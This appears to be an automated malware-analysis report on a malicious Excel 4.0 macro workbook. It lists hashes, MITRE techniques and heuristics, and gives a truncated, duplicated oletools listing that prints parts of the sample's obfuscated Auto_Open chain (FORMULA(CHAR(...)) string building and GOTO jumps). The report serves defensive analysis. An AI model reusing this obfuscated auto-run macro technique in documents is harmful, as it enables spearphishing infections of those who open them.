Office (OLE) malware analysis — malicious · 4bf87935d5ccf90f

MALICIOUS

Office (OLE)

231.0 KB Created: 2020-05-15 06:53:12 Authoring application: Microsoft Excel First seen: 2020-09-07

MD5: f792eb1f7207024167e158dbbac1f107 SHA-1: c1cc50603cd6f65479b335e7e023a11437c030ba SHA-256: 4bf87935d5ccf90f932a71ca0c7a51b996465cae321503bdfe64cf5061c84a35

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains Excel 4.0 macros, specifically an Auto_Open entry that is obfuscated and uses a chain of risky formulas. This technique is commonly used to download and execute further malicious content. The presence of an Auto_Open macro sheet strongly suggests it was delivered as a spearphishing attachment.

Heuristics 3

Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
Obfuscated XLM Auto_Open execution chain critical OLE_XLM_OBFUSCATED_AUTOEXEC_CHAIN

Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 128519 bytes

Filename	Kind	Source	Size
`xlm_macros.txt`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	128519 bytes
SHA-256: `ef9acf565d74dcd385c4494473c97cb7a05ae8eb2c678c6f10bb787a9a7b490f`
Preview script First 1,000 lines of the extracted script ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!FT15783 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,IB46,"",556.00000000000000000000 ' Sheet,HB57,"",-0.73626373626373631254 ' Sheet,HY71,"",-210.00000000000000000000 ' Sheet,GE89,"",0.10633946830265848804 ' Sheet,L98,"",546.00000000000000000000 ' Sheet,JR103,"",207.00000000000000000000 ' Sheet,FD172,"",60.86003906250000028422 ' Sheet,GV192,"",-984.62500000000000000000 ' Sheet,Y196,"",188.00000000000000000000 ' Sheet,BL198,"",-0.53763440860215050421 ' Sheet,IJ214,"",-0.04527260179434092202 ' Sheet,BQ220,"",280.00000000000000000000 ' Sheet,EN235,"",-237.00000000000000000000 ' Sheet,DA243,"",458.00000000000000000000 ' Sheet,DQ356,"",-1.04597701149425281741 ' Sheet,CG409,"",-0.16158536585365854132 ' Sheet,G418,"",0.23381294964028775940 ' Sheet,EA481,"",3.41509433962264141726 ' Sheet,ID515,"",-111.62500000000000000000 ' Sheet,DT562,"",-0.43956043956043955312 ' Sheet,JI598,"",4.24166666666666625218 ' Sheet,EO612,"",0.14341846758349705016 ' Sheet,IK641,"",0.24309392265193369154 ' Sheet,BM727,GOTO(W4047),"" ' Sheet,ER755,"",-2.68438538205980048446 ' Sheet,GY757,"",232.25000000000000000000 ' Sheet,JE768,"",182.00000000000000000000 ' Sheet,FO828,"",216.00000000000000000000 ' Sheet,GH837,"",15.00000000000000000000 ' Sheet,CB862,"",244.25000000000000000000 ' Sheet,GH926,"",-18.86718750000000000000 ' Sheet,S945,"",-158.00000000000000000000 ' Sheet,EY953,"",-2.87719298245614041321 ' Sheet,M985,"",-140.00000000000000000000 ' Sheet,ID1023,"",0.50828729281767959236 ' Sheet,IG1044,"",-243.25000000000000000000 ' Sheet,DM1063,"",-0.54358974358974354590 ' Sheet,IK1116,"",-1.30232558139534893016 ' Sheet,CV1134,"",1.22151898734177222217 ' Sheet,FB1149,"",-2.02222222222222214327 ' Sheet,BR1226,"",-119.00000000000000000000 ' Sheet,CF1238,"",0.02760433782451528206 ' Sheet,GY1257,"",-2.79166666666666651864 ' Sheet,DE1328,"",-457.00000000000000000000 ' Sheet,IV1356,"",147.62500000000000000000 ' Sheet,EA1423,"",4.54545454545454585826 ' Sheet,CS1427,"",8.12500000000000000000 ' Sheet,CG1510,"",9.40384615384615329958 ' Sheet,CB1571,"",86.62500000000000000000 ' Sheet,IB1585,"FORMULA(CHAR(FA59292/ED23049)&CHAR(FC4148/GY24364)&CHAR(FA59292/DN53968)&CHAR(CN38920+CD7716)&CHAR(FW62867/HY25011)&CHAR(G2786-BZ14170)&CHAR(CN38920-N45130)&CHAR(FW62867+CU57049)&CHAR(BP41192+DF31456)&CHAR(FA59292-GZ17562)&CHAR(O48941-L13906)&CHAR(FW62867+HD57454)&CHAR(O48941-CA63954)&CHAR(HN49771ED49994)&CHAR(FW62867+HO43339)&CHAR(CR48927-CY64958)&CHAR(HQ26180-CG64996)&CHAR(CN38920/JP38950)&CHAR(FW62867/ES18859)&CHAR(FA59292IT13202)&CHAR(CN38920FL61689)&CHAR(CR48927+IW18390)&CHAR(FA59292/EY953)&CHAR(O48941-CJ12832)&CHAR(HN49771JC30669)&CHAR(CR48927-CB862)&CHAR(BP41192-EU61913)&CHAR(O48941-CS48792)&CHAR(HQ26180+GB45702)&CHAR(O48941+FU60324)&CHAR(G2786+HP59389)&CHAR(CN38920+IB34978)&CHAR(FW62867/DT13358)&CHAR(FW62867-JP29799)&CHAR(FC4148-HU22550),GN41067)","" ' Sheet,IB1586,GOTO(DO37610),"" ' Sheet,ED1590,"",-1.22972972972972982575 ' Sheet,EV1596,"",-0.09054520358868184404 ' Sheet,GB1615,"",0.55958549222797926426 ' Sheet,DZ1620,"",-8.38541666666666607455 ' Sheet,FB1633,"",0.17177914110429448602 ' Sheet,GY1648,"",-465.00000000000000000000 ' Sheet,DV1663,"",1.04663212435233154984 ' Sheet,BK1686,"",-426.00000000000000000000 ' Sheet,DD1713,"",-0.15853658536585366057 ' Sheet,CZ1728,"",0.09482758620689654694 ' Sheet,II1809,"",0.51381215469613261693 ' Sheet,CY1812,"",-0.58333333333333337034 ' Sheet,IG1813,"",-1.78666666666666662522 ' Sheet,Q1814,"",-992.62500000000000000000 ' Sheet,GH1872,"",-1.21978021978021988758 ' Sheet,EY1877,"",-0.25000000000000000000 ' Sheet,FZ1882,"",47.5000 ... (truncated)

SHA-256: ef9acf565d74dcd385c4494473c97cb7a05ae8eb2c678c6f10bb787a9a7b490f

Preview script

First 1,000 lines of the extracted script

' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!FT15783 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,IB46,"",556.00000000000000000000
'  Sheet,HB57,"",-0.73626373626373631254
'  Sheet,HY71,"",-210.00000000000000000000
'  Sheet,GE89,"",0.10633946830265848804
'  Sheet,L98,"",546.00000000000000000000
'  Sheet,JR103,"",207.00000000000000000000
'  Sheet,FD172,"",60.86003906250000028422
'  Sheet,GV192,"",-984.62500000000000000000
'  Sheet,Y196,"",188.00000000000000000000
'  Sheet,BL198,"",-0.53763440860215050421
'  Sheet,IJ214,"",-0.04527260179434092202
'  Sheet,BQ220,"",280.00000000000000000000
'  Sheet,EN235,"",-237.00000000000000000000
'  Sheet,DA243,"",458.00000000000000000000
'  Sheet,DQ356,"",-1.04597701149425281741
'  Sheet,CG409,"",-0.16158536585365854132
'  Sheet,G418,"",0.23381294964028775940
'  Sheet,EA481,"",3.41509433962264141726
'  Sheet,ID515,"",-111.62500000000000000000
'  Sheet,DT562,"",-0.43956043956043955312
'  Sheet,JI598,"",4.24166666666666625218
'  Sheet,EO612,"",0.14341846758349705016
'  Sheet,IK641,"",0.24309392265193369154
'  Sheet,BM727,GOTO(W4047),""
'  Sheet,ER755,"",-2.68438538205980048446
'  Sheet,GY757,"",232.25000000000000000000
'  Sheet,JE768,"",182.00000000000000000000
'  Sheet,FO828,"",216.00000000000000000000
'  Sheet,GH837,"",15.00000000000000000000
'  Sheet,CB862,"",244.25000000000000000000
'  Sheet,GH926,"",-18.86718750000000000000
'  Sheet,S945,"",-158.00000000000000000000
'  Sheet,EY953,"",-2.87719298245614041321
'  Sheet,M985,"",-140.00000000000000000000
'  Sheet,ID1023,"",0.50828729281767959236
'  Sheet,IG1044,"",-243.25000000000000000000
'  Sheet,DM1063,"",-0.54358974358974354590
'  Sheet,IK1116,"",-1.30232558139534893016
'  Sheet,CV1134,"",1.22151898734177222217
'  Sheet,FB1149,"",-2.02222222222222214327
'  Sheet,BR1226,"",-119.00000000000000000000
'  Sheet,CF1238,"",0.02760433782451528206
'  Sheet,GY1257,"",-2.79166666666666651864
'  Sheet,DE1328,"",-457.00000000000000000000
'  Sheet,IV1356,"",147.62500000000000000000
'  Sheet,EA1423,"",4.54545454545454585826
'  Sheet,CS1427,"",8.12500000000000000000
'  Sheet,CG1510,"",9.40384615384615329958
'  Sheet,CB1571,"",86.62500000000000000000
'  Sheet,IB1585,"FORMULA(CHAR(FA59292/ED23049)&CHAR(FC4148/GY24364)&CHAR(FA59292/DN53968)&CHAR(CN38920+CD7716)&CHAR(FW62867/HY25011)&CHAR(G2786-BZ14170)&CHAR(CN38920-N45130)&CHAR(FW62867+CU57049)&CHAR(BP41192+DF31456)&CHAR(FA59292-GZ17562)&CHAR(O48941-L13906)&CHAR(FW62867+HD57454)&CHAR(O48941-CA63954)&CHAR(HN49771*ED49994)&CHAR(FW62867+HO43339)&CHAR(CR48927-CY64958)&CHAR(HQ26180-CG64996)&CHAR(CN38920/JP38950)&CHAR(FW62867/ES18859)&CHAR(FA59292*IT13202)&CHAR(CN38920*FL61689)&CHAR(CR48927+IW18390)&CHAR(FA59292/EY953)&CHAR(O48941-CJ12832)&CHAR(HN49771*JC30669)&CHAR(CR48927-CB862)&CHAR(BP41192-EU61913)&CHAR(O48941-CS48792)&CHAR(HQ26180+GB45702)&CHAR(O48941+FU60324)&CHAR(G2786+HP59389)&CHAR(CN38920+IB34978)&CHAR(FW62867/DT13358)&CHAR(FW62867-JP29799)&CHAR(FC4148-HU22550),GN41067)",""
'  Sheet,IB1586,GOTO(DO37610),""
'  Sheet,ED1590,"",-1.22972972972972982575
'  Sheet,EV1596,"",-0.09054520358868184404
'  Sheet,GB1615,"",0.55958549222797926426
'  Sheet,DZ1620,"",-8.38541666666666607455
'  Sheet,FB1633,"",0.17177914110429448602
'  Sheet,GY1648,"",-465.00000000000000000000
'  Sheet,DV1663,"",1.04663212435233154984
'  Sheet,BK1686,"",-426.00000000000000000000
'  Sheet,DD1713,"",-0.15853658536585366057
'  Sheet,CZ1728,"",0.09482758620689654694
'  Sheet,II1809,"",0.51381215469613261693
'  Sheet,CY1812,"",-0.58333333333333337034
'  Sheet,IG1813,"",-1.78666666666666662522
'  Sheet,Q1814,"",-992.62500000000000000000
'  Sheet,GH1872,"",-1.21978021978021988758
'  Sheet,EY1877,"",-0.25000000000000000000
'  Sheet,FZ1882,"",47.5000
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.